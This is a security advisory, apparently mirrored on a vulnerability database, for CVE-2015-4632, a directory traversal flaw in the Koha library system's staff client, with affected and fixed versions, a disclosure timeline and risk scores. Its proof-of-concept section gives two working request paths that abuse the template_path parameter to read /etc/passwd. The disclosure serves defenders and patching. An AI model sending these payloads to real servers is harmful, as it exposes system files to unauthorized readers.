Koha 3.20.1 - Directory Traversal

🗓️ 26 Jun 2015 00:00:00Reported by Raschin Tavakoli, Bernhard Garn, Peter Aufner & Dimitris SimosType

Koha Open Source ILS - Directory Traversal vulnerability allowing remote attackers to read arbitrary file

Reporter	Title	Published	Views	Family All 12
0day.today	Koha 3.20.1 - Multiple XSS and XSRF Vulnerabilities	26 Jun 201500:00	–	zdt
0day.today	Koha 3.20.1 - Path Traversal Vulnerability	26 Jun 201500:00	–	zdt
Circl	CVE-2015-4632	19 Oct 201800:23	–	circl
CVE	CVE-2015-4632	18 Oct 201820:00	–	cve
Cvelist	CVE-2015-4632	18 Oct 201820:00	–	cvelist
Exploit DB	Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities	26 Jun 201500:00	–	exploitdb
exploitpack	Koha 3.20.1 - Directory Traversal	26 Jun 201500:00	–	exploitpack
exploitpack	Koha 3.20.1 - Multiple Cross-Site Scripting Cross-Site Request Forgery Vulnerabilities	26 Jun 201500:00	–	exploitpack
Nuclei	Koha 3.20.1 - Directory Traversal	24 Jun 202603:02	–	nuclei
NVD	CVE-2015-4632	18 Oct 201821:29	–	nvd

# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research ([email protected])
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4632



### CVE-2015-4632 ### 

#### Titel: ####
Directory traversal

#### Type of vulnerability: ####
File Path Traversal

##### Exploitation vector:
Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search

##### Attack outcome:
Read access to arbitrary files on the system

#### Impact: ####
{low,medium,high,critical}
high

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, 
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4632

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
[email protected]
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: [email protected]

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search 

#### Proof-of-concept: ####
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

26 Jun 2015 00:00Current

7.7High risk

Vulners AI Score7.7

CVSS 25

CVSS 37.5

EPSS0.51829